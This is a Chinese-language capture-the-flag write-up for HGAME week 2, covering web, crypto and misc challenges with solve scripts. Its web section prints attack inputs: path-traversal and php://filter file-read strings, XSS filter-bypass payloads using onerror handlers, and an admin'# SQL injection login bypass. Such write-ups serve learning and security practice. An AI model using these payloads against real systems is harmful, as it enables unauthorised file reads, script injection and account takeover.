HGAME-WEEK2-WRITE-UP

本文主要是介绍HGAME-WEEK2-WRITE-UP，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

HGAME-WEEK2-WRITE-UP

web

Random?

vim在线改代码导致源码泄露。读一下random.php.swp

发现关键代码

$emmm =unserialize(serialize($a));

if(!is_object( $emmm)) {

die("error") ;

}

$emmm->public = random_int(0,100000000);

$emmm->secret=random_int(0,100000000);

if($emmm->public == $emmm->secret) {

echo $flag;

}

传入的emmm类的public和secret会赋予随机值。这种情况可以印地址，就可以让他们随机的值是一样的。

class emmm{

public $public;

public $secret;

}

$a=new emmm( );

$a->secret= &$a->public;

echo urlencode(serialize($a));

传入即可拿到flag

草莓社区-1

简单的LFI,直接

?mao=../flag.php拿到flag。

草莓社区-2

还是LFI，利用php伪协议读文件流

?mao=php://filter/read=convert.base64-encode/resource=../flag.php

再base64解码一下拿到flag。

XSS-1

看一下过滤：

function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');
return '<article>' + input+ '</article>';
}

发现可以用img

<img src=x οnerrοr="javascript:window.οnerrοr=alert;throw 1">

<img src=x οnerrοr=alert(1)>

xss-2

看一下过滤

function charge(input) {
input = input.replace(/script/gi, '_');
input = input.replace(/img/gi, '_');
input = input.replace(/image/gi, '_');
input = input.replace(/\(/, '_');
input = input.replace(/\>/, '_');
return '<input value="' + input + '" type="text">';
}

可以用html实体编码绕过

" type="image" src="a" οnerrοr="alert(1)

或者使用video标签

">><video src=1 οnerrοr=alert`1`>

最简单的注入

直接万能密码注入

用户名admin'#密码随便输

CRYPTO

easy rsa

题目地址：

https://pastebin.com/yB5SQdhn

matlab解一下方程，直接脚本跑一下

贴脚本：

import libnum

from Crypto.Util.number import long_to_bytes

c = 4371976065894333890314975885075127128451240983808800709698046359245834252220415066013588488225793488033803390795656718853587692177687489853479502247266771924035749805299269602527272036788769904108885493823764984982805025952459173246366939243972669582338728034363614943062106220697944193226897767645789368465460202024200438535770983989035642434091720020123447189714932941203953201421143816856602410516207702904806903435163191348277867475813985765685033173827201970396908439360218409562692753257235084893548449865848486681931258855329384534422245333790248671083002562017871712806386748477524316776702973435067495735891

n = 10385112853503545283534594498014002163302819192542881359629016178651814593394538223939733674125477453748418677846543570433509186453439897628509042367641638605796280506469598857872127102183624493512082415420093824666579257184064851925863532407038708153173813845163607930388067232852387553655027755138043051251085946275767001373277444643651026212284925970808939348126454571156523402419571304104957238600724334148041629955456548891850609245486162713434748801968838458008730625275388077430783612116161245037630984479400721315318755404657093206825883572149393481806067157147431981573823960963614146686202457034323040706001

e = 65537

q = 133933997083089702453762501404889177223101226391505098183662564932163520880840961997705471383994176453589438770453090229951122946358812891951990562931866917274839029543379127657118330152316223686977562429606765674161593995316431725070847817817971515410474392037818149046718091344525818647452862614261258250943

p = 77539034746053684621485923427812119975612066379333186124187109849041447728407846098413602773105733428368391023092694065216091918285267572895015826696139841052638816326722407574936479442873205847400304572160883362157525347684671046552636655778287167264844797530347881153376471545728177228869882730086666365807

d = libnum.invmod(e, (p - 1) * (q - 1))

m = pow(c, d, n)

print long_to_bytes(m)

附上一个在线分解大数n的网站

http://factordb.com/index.php

The same simple RSA

使用openssl命令读取pubkey.pem的信息，这题的详解我在我之前的文章《关于openssl命令的一些随笔》中写过了。这里不细讲。

Caesar&&Caesar

mnbr firrf ztaii af vx meteq hal jzrvbz zulaq, qhsseey onyicinbh iyvnqío phw ko esflqsee hahx
uifhtux rfgskusfn jvxu lzs somoii tbcd omd tb rbzgfvrf bji. rt gvta xzmr atjsedb ktz e miyztni ff
gkxuxp aqcul lfufsl, iyzlg cg alv bnbd vj r rvjxy sw cysty artrf moek rnb tsseg n pxk sw pbzbzlvd
fhhuij, wuwvo avrr kapxv aar xusimbil, smbe cfxomjtbfbj ixgf. hal afryr phw jo esvlrk tuom teey
gvbukj lnqdlh eazsl, hru ia ckkii tb wgkmtags moid ig ktz rvcrglhvp tb dhprk. eiskf cvae rnymeg gvx
tsetu cy teicu o yhqzll cy yexgrr zftjirg pvycd fsm bt khrwk aietf bxhv khr jbsprgr, ogk aztu o zyirt
hdkvei os dbwij aar dlxklrrkbqj tusr dsllq rbztcal bxd mevrbmpses. swkzx khrm uyslguh moi datbxa.
e yenjr ncgsl kbal rn hbmhqvd ostyh rnq gihvioj vtuhj, wuc buxioqivlh yizgxsj rs zsexyírdrg,
ibx fn n phsh guozbj hvmbblavrtvcg vj nhnh al lzmfsem grlysw alv evuaal noarxy sw tus eleinrr tsgyezwlaw
ff zovlhfnvo.

维吉尼亚解密。这里附上一个在线爆破维吉尼亚的网站。

https://www.guballa.de/vigenere-solver

violence

贴一下题目：

a = ?

b = ?

m = ?

flag = "hgame{" + m + "}"

cipher = ''

for i in m:

if96<ord(i) <123:

cipher += chr(a * (ord(i) + b - 97) % 26)

else:

cipher += i

print cipher.encode('hex')

# https://www.wikiwand.com/en/Affine_cipher flag是一个有意义的句子

# cipher = 1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105

典型的仿射加密，爆破一下ab。

解密脚本：

import gmpy2

a = [1, 3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25]

c = '1917090506070905195f07065f06031505195f035f0a07065f170c5f1407170205101105'.decode('hex')

c = list(c)

def dec(a, b, c):

m = ''

for k in c:

if96<ord(k) +97<123:

m += chr((a * (ord(k) - b) % 26) + 97)

else:

m += k

m = m.split('_')

if m[3] =='a'or m[3] =='i':

print m

for i in a:

for j inrange(1, 27):

dec(int(gmpy2.invert(i, 26)), j, c)

xasr

没搞出来。

misc

咻咻咻

打开压缩包发现没密码。

那可能就是zip伪加密了。

解压出来发现是一个wav文件。那可能是wav的LSB隐写。github上找脚本。

https://ethackal.github.io/2015/10/05/derbycon-ctf-wav-steganography/

需要Ruby环境

Base64，解码得flag。

White cosmos

发现是16进制09和20，上次pwnhub密码学专场做了一个类似的（还被我拿到了pwnhub邀请码233333），不过不知道为啥这次我拿我脚本跑不出来了，后来才发现直接转16进制，再转字符串就行了。

只要把09和20分别替换成0和1就行直接贴解密脚本：

# !/usr/bin/python
# coding=utf-8s='09092009 20202020 09092020 09090920 09092020 20200920 09092009 09200920 09092020 09200920 09090909 20090920 09200920 09090920 09092020 09200920 09092009 09202020 09092020 20090920 20090920 20202020 09092009 09200920 09092020 09200920 09200909 09090920 20090920 20092020 09200909 09090920 09200920 09090920 09092009 20202020 09202009 20200920 09090920 09202020 09092020 09200920 09200909 09090920 09090920 20090920 09090920 20202020 20090920 09202020 09092020 20090920 09092020 09200920 09090909 092009'temp = ((s.replace('09','1')).replace('20', '0')).split()
temp = "".join(temp)print hex(int(temp,2))

easy password

给出密码是小写字母和数字了，直接爆破压缩包密码。得flag。

mysterious file header

发现是class文件，拿DJ Java Decompiler反编译出java代码。

/*
 * Decompiled with CFR 0_123.
 */
package GUI;import java.awt.Component;
import java.awt.GridLayout;
import java.awt.LayoutManager;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.JTextArea;public class hgameGUI
        extends JFrame {
    private static final int DEFAULT_WIDTH = 300;
    private static final int DEFAULT_HEIGHT = 200;    public hgameGUI() {
        super("Welcome to Hgame!");
        this.setSize(300, 200);
        JButton flag1 = new JButton("i'm flag");
        JButton flag2 = new JButton("i'm flag, too.");
        JButton flag3 = new JButton("RU kidding me? I'm the true flag!");
        JButton flag4 = new JButton("UR wrong, I'm the true flag!");
        JTextArea flagtext = new JTextArea("Want flag? Try upstairs.");
        JPanel flag = new JPanel();
        flag.setLayout(new GridLayout(5, 1));
        flag.add(flag1);
        flag.add(flag2);
        flag.add(flag3);
        flag.add(flag4);
        flag.add(flagtext);
        flag1.addActionListener(event -> {
                    flagtext.setText("118");
                }
        );
        flag2.addActionListener(event -> {
                    flagtext.setText("54");
                }
        );
        flag3.addActionListener(event -> {
                    flagtext.setText("29");
                }
        );
        flag4.addActionListener(event -> {
                    flagtext.setText("89");
                }
        );
        this.add(flag);
    }
}